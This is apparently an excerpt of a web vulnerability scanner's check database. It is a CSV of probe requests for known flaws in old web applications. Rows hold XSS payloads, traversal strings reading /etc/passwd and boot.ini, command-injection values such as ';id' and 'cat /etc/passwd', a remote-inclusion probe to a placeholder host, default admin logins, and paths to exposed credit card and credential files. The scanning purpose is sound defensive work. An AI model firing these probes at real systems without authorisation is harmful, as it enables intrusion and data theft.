c,generic,/,updates/,200,GET,"This might be interesting..."
c,generic,/,usage/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,user.php?op=userinfo&uname=<script>alert('hi');</script>,"<script>alert('hi');</script>",GET,"The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02."
c,generic,/,user/,200,GET,"This might be interesting..."
c,generic,/,usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27),GET,"<script>alert('Vulnerable')</script>",GET,"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,userinfo.php?uid=1;,"Query",GET,"Xoops portal gives detailed error messages including SQL syntax and may allow an exploit."
c,generic,/,userlog.php,200,GET,"Teekai's Tracking Online 1.0 log can be retrieved remotely."
c,generic,/,users/,200,GET,"This might be interesting..."
c,generic,/,ustats/,200,GET,"This might be interesting..."
c,generic,/,vfs/,200,GET,"This might be interesting..."
c,generic,/,viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1,"root:",GET,"KorWebLog from http://weblog.kldp.org/ allows any file to be read on the system."
c,generic,/,view_source.jsp,200,GET,"Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable."
c,generic,/,w3perl/admin,200,GET,"This might be interesting..."
c,generic,/,warez/,200,GET,"Uh oh..."
c,generic,/,web/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,web/,200,GET,"This might be interesting..."
c,generic,/,web800fo/,200,GET,"This might be interesting..."
c,generic,/,webaccess.htm,200,GET,"Just found this log file..."
c,generic,/,webaccess/access-options.txt,200,GET,"Just found this file..."
c,generic,/,webadmin/,200,GET,"This might be interesting...may be HostingController, www.hostingcontroller.com"
c,generic,/,webalizer/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,webboard/,200,GET,"This might be interesting..."
c,generic,/,webcart-lite/,200,GET,"This might be interesting..."
c,generic,/,webcart/,200,GET,"This might be interesting..."
c,generic,/,webdata/,200,GET,"This might be interesting..."
c,generic,/,weblog/,200,GET,"This might be interesting..."
c,generic,/,weblogic,"index of",GET,"Weblogic directory is available with indexing."
c,generic,/,weblogs/,200,GET,"This might be interesting..."
c,generic,/,webmail/,200,GET,"Web based mail package installed."
c,generic,/,WebShop/,200,GET,"This might be interesting..."
c,generic,/,website/,200,GET,"This might be interesting..."
c,generic,/,webstats/,200,GET,"This might be interesting..."
c,generic,/,WebTrend/,200,GET,"This might be interesting..."
c,generic,/,Web_store/,200,GET,"This might be interesting..."
c,generic,/,wstats/,200,GET,"This might be interesting..."
c,generic,/,WS_FTP.ini,200,GET,"Can contain saved passwords for ftp sites"
c,generic,/,ws_ftp.ini,200,GET,"Can contain saved passwords for ftp sites"
c,generic,/,wusage/,200,GET,"This might be interesting..."
c,generic,/,www-sql/,200,GET,"This might be interesting..."
c,generic,/,www/,200,GET,"This might be interesting..."
c,generic,/,wwwjoin/,200,GET,"This might be interesting..."
c,generic,/,wwwlog/,200,GET,"This might be interesting..."
c,generic,/,wwwstats.html,200,GET,"Just found this log file..."
c,generic,/,wwwstats/,200,GET,"This might be interesting..."
c,generic,/,zipfiles/,200,GET,"This might be interesting..."
c,generic,/,~root/,200,GET,"Allowed to browse root's home directory"
c,generic,////./../.../,boot.ini,"boot loader",GET,"Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details."
c,generic,/a.jsp/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02."
c,generic,/accounts/,getuserdesc.asp,200,GET,"Hosting Controller 2002 administration page is available. This should be protected."
c,generic,/achievo/,/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/,"http://xxxxxxxxxx/atk/",GET,"Achievo can be made to include php files from another domain. Upgrade to a new version."
c,generic,/Admin,/,"CobaltServer",GET,"The web server is the CobaltRaq administrator. If password protection is broken, attackers wil have access to admin your server. Use tcpwrappers or shut this down for safety."
c,generic,/admin/,"login.php?path=\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/admin/,admin_phpinfo.php4,200,GET,"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected."
c,generic,/admin/,browse.asp?FilePath=c:\&Opt=2&level=0,"winnt",GET,"Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely."
c,generic,/admin/,cplogfile.log,200,GET,"DevBB 1.0 final (http://www.mybboard.com)  log file is readable remotely. Upgrade to the latest version."
c,generic,/admin/,login.php?action=insert&username=test&password=test,200,GET,"phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify."
c,generic,/Admin_files/,order.log,200,GET,"Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt."
c,generic,/aktivate/cgi-bin/,"catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212, CA-2000-02."
c,generic,/ans/,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely."
c,generic,/anthill/,login.php,200,GET,"Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02"
c,generic,/ASP/cart/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/b2-include/,b2edit.showposts.php,200,GET,"Some versions of B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote php file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed."
c,generic,/base/webmail/,readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1,"root:",GET,"Remote file retrieval."
c,generic,/bb-dnbd/,faxsurvey,200,GET,"This may allow arbitrary command execution."
c,generic,/cart,cart.cgi,200,GET,"If this is Dansie shopping cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands."
c,generic,/ccbill/secure/,ccbill.log,200,GET,"This might be interesting... CC Bill log file?"
c,generic,/cfappman/,index.cfm,200,GET,"susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm"
c,generic,/cfdocs/,cfcache.map,"Mapping",GET,"May leak directy listing, may also leave server open to a DOS"
c,generic,/cfdocs/,cfmlsyntaxcheck.cfm,200,GET,"can be used for a DoS on the server by requesting it check all .exe's"
c,generic,/cfdocs/,exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files"
c,generic,/cfdocs/,exampleapp/email/application.cfm,200,GET,"This might be interesting..."
c,generic,/cfdocs/,exampleapp/email/getfile.cfm?filename=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files"
c,generic,/cfdocs/,exampleapp/publish/admin/addcontent.cfm,200,GET,"This might be interesting..."
c,generic,/cfdocs/,exampleapp/publish/admin/application.cfm,200,GET,"This might be interesting..."
c,generic,/cfdocs/,examples/cvbeans/beaninfo.cfm,200,GET,"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm"
c,generic,/cfdocs/,examples/httpclient/mainframeset.cfm,200,GET,"This might be interesting"
c,generic,/cfdocs/,examples/parks/detail.cfm,200,GET,"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm"
c,generic,/cfdocs/,expeval/displayopenedfile.cfm,200,GET,"Unknown vul"
c,generic,/cfdocs/,expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files."
c,generic,/cfdocs/,expeval/openfile.cfm,200,GET,"Can use to expose the system/server path."
c,generic,/cfdocs/,expeval/sendmail.cfm,200,GET,"can be used to send email; go to the page and fill in the form"
c,generic,/cfdocs/,snippets/evaluate.cfm,200,GET,"can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info"
c,generic,/cfdocs/,snippets/fileexists.cfm,200,GET,"can be used to verify the existance of files (on the same drive info as the web tree/file)"
c,generic,/cfdocs/,snippets/gettempdirectory.cfm,200,GET,"depending on install, creates files, gives you physical drive info, sometimes defaults to \winnt\ directory as temp directory"
c,generic,/cfdocs/,snippets/viewexample.cfm,200,GET,"this can be used to view .cfm files, request viewexample.cfm?Tagname=..\..\..\file  (.cfm is assumed)"
c,generic,/CFIDE/administrator/,index.cfm,"PasswordProvided",GET,"Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314."
c,generic,/cfide/administrator/,index.cfm,"PasswordProvided",GET,"Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314."
c,generic,/cgi,/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini,"[fonts]",GET,"The ColdFusion install allows attackers to read arbitrary files remotely"
c,generic,/cgi,/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini,"[fonts]",GET,"The ColdFusion install allows attackers to read arbitrary files remotely"
c,generic,/cgi-bin-sdb/,printenv,"/usr/bin/perl",GET,"SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf"
c,generic,/cgi-bin/,"handler/netsonar;cat	/etc/passwd|?data=Dowload","root:",GET,"comes with IRIX 5.3 - 6.4; allows to run arbitrary commands"
c,generic,/cgi-bin/,.cobalt/siteUserMod/siteUserMod.cgi,200,GET,"Older versions of this CGI allow any user to change the administrator password."
c,generic,/cgi-bin/,bigconf.cgi,200,GET,"BigIP Configuration CGI"
c,generic,/cgi-bin/,common/listrec.pl,200,GET,"This CGI allows attackers to execute commands on the host."
c,generic,/cgi-bin/,dbmlparser.exe,200,GET,"This might be interesting..."
c,generic,/cgi-bin/,handler,200,GET,"comes with IRIX 5.3 - 6.4; allows to run arbitrary commands"
c,generic,/cgi-bin/,icat,200,GET,"This might be interesting..."
c,generic,/cgi-bin/,MachineInfo,200,GET,"gives out information on the machine (IRIX), including hostname"
c,generic,/cgi-bin/,pfdisplay.cgi,200,GET,"comes with IRIX 6.2-6.4; allows to run arbitrary commands"
c,generic,/cgi-bin/,webdist.cgi,200,GET,"comes with IRIX 5.0 - 6.3; allows to run arbitrary commands"
c,generic,/cgi-bin/,wrap,200,GET,"comes with IRIX 6.2; allows to view directories"
c,generic,/cgi-bin/admin/,admin.cgi,200,GET,"May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio."
c,generic,/cgi-bin/admin/,setup.cgi,200,GET,"May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio."
c,generic,/cgi-local/cgiemail-1.4/,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/cgi-local/cgiemail-1.4/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,/cgi-local/cgiemail-1.6/,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/cgi-local/cgiemail-1.6/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,/cgi-shop/,view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows reading of remote files. CAN-2001-1019."
c,generic,/cgi-sys/,addalink.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,cgiecho,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,cgiemail,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,countedit,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,domainredirect.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,entropybanner.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,entropysearch.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,FormMail-clone.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,helpdesk.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,mchat.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,randhtml.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,realhelpdesk.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,realsignup.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,scgiwrap,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi-sys/,signup.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web"
c,generic,/cgi/,cgiproc?,200,GET,"It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later."
c,generic,/cgis/wwwboard/,wwwboard.cgi,200,GET,"Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'."
c,generic,/cgis/wwwboard/,wwwboard.pl,200,GET,"Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'."
c,generic,/chassis/config/,GeneralChassisConfig.html,"Chassis Configuration",GET,"The Cabletron switch may allow remote configuration, or data retrieval, through the web interface."
c,generic,/comments/,browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/config,/,200,GET,"Configuration information may be available remotely."
c,generic,/config/,checks.txt,200,GET,"This might be interesting..."
c,generic,/counter/,1/n/n/0/3/5/0/a/123.gif,200,GET,"The Roxen Counter may eat up excessive CPU time with image requests."
c,generic,/data/,member_log.txt,200,GET,"Teekai's forum full 1.2 member's log can be retrieved remotely."
c,generic,/data/userlog/,log.txt,200,GET,"Teekai's Tracking Online 1.0 log can be retrieved remotely."
c,generic,/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/dc/auth_data/,auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/dc/orders/,orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/dcforum/,dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00,"root:",GET,"This install of DCForum allows attackers to read arbitrary files on the host."
c,generic,/dcshop/auth_data/,auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/dcshop/orders/,orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
c,generic,/demo/ojspext/events/,globals.jsa,"event:application_OnStart",GET,"Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information."
c,generic,/demo/sql/,index.jsp,"JSP SQL Samples",GET,"This default may allow connectivity to the Oracle databases."
c,generic,/doc,/,200,GET,"The /doc directory is browsable. This may be /usr/doc."
c,generic,/doc/packages,/,"index of /doc",GET,"This directory may show attackers all the packages installed on the system."
c,generic,/docs/,showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini,"boot loader",GET,"Gafware's CFXImage allows remote users to view any file on the system."
c,generic,/error/,"500error.jsp?et=1<script>alert('Vulnerable')</script>;","<script>alert('Vulnerable')</script>",GET,"Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02."
c,generic,/etc/,passwd,"root:",GET,"An '/etc/passwd' file is available through the web site. This may not be good at all."
c,generic,/ews/ews/,architext_query.pl,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665."
c,generic,/examples/basic/servlet/,HelloServlet,"The source of this servlet is in",GET,"Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet."
c,generic,/exec/show/config/,cr,"ip address",GET,"The Cisco router's web install allows arbitrary commands to be executed remotely."
c,generic,/fcgi-bin/,echo.exe?foo=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/fcgi-bin/,echo2.exe?foo=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/filemanager/,filemanager_forms.php,200,GET,"Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info"
c,generic,/forum/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
c,generic,/fpdb/,shop.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/GW5/,GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system."
c,generic,/html/cgi-bin/,cgicso?query=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/html/cgi-bin/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands."
c,generic,/instantwebmail/,message.php,200,GET,"Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email."
c,generic,/interscan/cgi-bin/,"FtpSave.dll?I'm%20Here","These settings have been saved",GET,"Multiple files in the Interscan management server allow attackers to change settins without auth. Upgrade to the latest version of the Interscan product."
c,generic,/jsp/jspsamp/jspexamples/,viewsource.jsp?source=../../../../../../../../../../boot.ini,"boot loader",GET,"Default JRun CGI lets users read any system file."
c,generic,/jsp/jspsamp/jspexamples/,viewsource.jsp?source=../../../../../../../../../../etc/passwd,"root:",GET,"Default JRun CGI lets users read any system file."
c,generic,/jspdocs,/,"OracleJSP",GET,"Default Oracle JSP documentation."
c,generic,/level/42/exec/,show%20conf,200,GET,"Retrieved Cisco configuration file."
c,generic,/logs,/,200,GET,"Ahh...log information...fun!"
c,generic,/logs/,access_log,200,GET,"Just found this log..."
c,generic,/mail,/,200,GET,"This might be interesting..."
c,generic,/mail/,addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com,"<script>alert('Vulnerable')</script>",GET,"IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/mailman/admin/,"ml-name?\"><script>alert('Vulnerable')</script>;","<script>alert('Vulnerable')</script>",GET,"Mailmain is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/mailman/listinfo/,<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02."
c,generic,/mall_log_files/,order.log,200,GET,"EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details."
c,generic,/manage/cgi/,cgiproc,200,GET,"This might be interesting..."
c,generic,/manager,/,200,GET,"May be a web server or site manager."
c,generic,/marketing,/,200,GET,"This might be interesting..."
c,generic,/mcartfree/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." 
c,generic,/members,/,200,GET,"This might be interesting..."
c,generic,/metacart/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web."
c,generic,/MIDICART/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server."
c,generic,/ministats/,admin.cgi,200,GET,"Just found this cgi..."
c,generic,/misc,/,200,GET,"This might be interesting..."
c,generic,/mkstats,/,200,GET,"This might be interesting..."
c,generic,/msql,/,200,GET,"This might be interesting..."
c,generic,/nav/,cList.php?root=</script><script>alert('Vulnerable')/<script>,<script>alert('Vulnerable')/<script>,GET,"RaQ3 server script is vulnerable to Cross Site Scripting (XSS).  CA-2000-02."
c,generic,/nuke/,modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/odbc,/,200,GET,"This might be interesting..."
c,generic,/oekaki,/,".conf",GET,"The PaintBBS Server may allow unauthorized access to the config files."
c,generic,/officescan/,cgi/jdkRqNotify.exe,200,GET,"This might be interesting..."
c,generic,/officescan/hotdownload/,ofscan.ini,200,GET,"OfficeScan from Trend Micro allows anyone to read the ofscan.ini file, which may contain passwords."
c,generic,/ojspdemos/basic/,hellouser/hellouser.jsp,200,GET,"Oracle 9i default jsp page found, may be vulnerable to XSS in any field."
c,generic,/ojspdemos/basic/,simple/usebean.jsp,200,GET,"Oracle 9i default jsp page found, may be vulnerable to XSS in any field."
c,generic,/ojspdemos/basic/,simple/welcomeuser.jsp,200,GET,"Oracle 9i default jsp page found, may be vulnerable to XSS in any field."
c,generic,/old,/,200,GET,"This might be interesting..."
c,generic,/order/,order_log.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/order/,order_log_v12.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/orders/,checks.txt,200,GET,"This might be interesting..."
c,generic,/orders/,mountain.cfg,200,GET,"This might be interesting..."
c,generic,/orders/,orders.log,200,GET,"This might be interesting..."
c,generic,/orders/,orders.txt,200,GET,"This might be interesting..."
c,generic,/Orders/,order_log.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/orders/,order_log.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/Orders/,order_log_v12.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/orders/,order_log_v12.dat,200,GET,"Web shopping system from http://www.io.com/~rga/scripts/cgiorder.html exposes order information, see http://www.mindsec.com/advisories/post2.txt"
c,generic,/ows-bin/,perlidlc.bat?&dir,"ows-bin:",GET,"The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html"
c,generic,/pccsmysqladm/incs/,dbconnect.inc,200,GET,"This file should not be accessible, as it contains database connectivity information. Upgrade to version 1.2.5 or higher."
c,generic,/PDG_Cart/,oder.log,200,GET,"Shopping cart software log"
c,generic,/PDG_Cart/,shopper.conf,"Authnet_Login",GET,"PDGSoft's PDG Shopping Cart 1.5 Êhttp://www.pdgsoft.com/ , Shopping cart software log, http://www.mindsec.com/advisories/post2.txt"
c,generic,/perl/,"-e%20%22system('cat%20/etc/passwd');\%22","root:",GET,"The installed perl interpreter allows any command to be executed remotely."
c,generic,/pforum/,edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1,"<script>alert('Vulnerable')</script>",GET,"Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02"
c,generic,/phorum/admin/,footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/phorum/admin/,header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/phorum/admin/,stats.php,"Phorum Stats",GET,"PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it."
c,generic,/php/,mlog.phtml,200,GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/php/,mylog.phtml?screen=/etc/passwd,"root:",GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/php/,php.exe?c:\winnt\boot.ini,"boot loader",GET,"Apache/PHP installations can be misconfiugred (according to documentation) to allow files to be retrieved remotely."
c,generic,/phpBB/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
c,generic,/phpBB2/includes/,db.php,200,GET,"Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/securitynews/5BP0F2A6KC.html for more info"
c,generic,/phpclassifieds/,latestwap.php?url=<script>alert('Vulnerable');</script>,"<script>alert('Vulnerable')</script>",GET,"PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable toCross Site Scripting (XSS). CA-2000-02."
c,generic,/phpEventCalendar/,file_upload.php,200,GET,"phpEventCalendar 1.1 and prior vulnerable to file upload bug."
c,generic,/phpnuke/,modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/phprocketaddin/,?page=../../../../../../../../../../boot.ini,"boot loader",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host."
c,generic,/phprocketaddin/,?page=../../../../../../../../../../etc/passwd,"root:",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host."
c,generic,/pls/,sample/admin_/help/..%255cplsql.conf,"Directives added for mod-plsql",GET,"Oracle 9iAS allows mod_plsql to perform a directory traversal."
c,generic,/pls/help/,<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/pls/portal30/,admin_/,"Gateway Configuration Menu",GET,"Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface."
c,generic,/pls/simpledad/admin_/,gateway.htm?schema=sample,"Gateway Configuration Menu",GET,"This default may allow limited administration of the Oracle server."
c,generic,/project/,index.php?m=projects&user_cookie=1,200,GET,"dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL."
c,generic,/pub/,english.cgi?op=rmail,200,GET,"BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely. See http://www.securitytracker.com/alerts/2002/Jan/1003092.html"
c,generic,/pvote/,ch_info.php,200,GET,"PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password."
c,generic,/pw/,storemgr.pw,200,GET,"Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information."
c,generic,/ROADS/cgi-bin/,search.pl?form=../../../../../../../../../../etc/passwd%00,"root:",GET,"The ROADS search.pl allows attackers to retrieve system files."
c,generic,/scripts/,wsisa.dll/WService=anything?WSMadmin",200,GET,"Allows Webspeed to remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0"
c,generic,/search97cgi/,s97_cgi,200,GET,"SCO Unixware search script may be vulnerable to XSS and command injection, BID-1717, CVE-2000-1014"
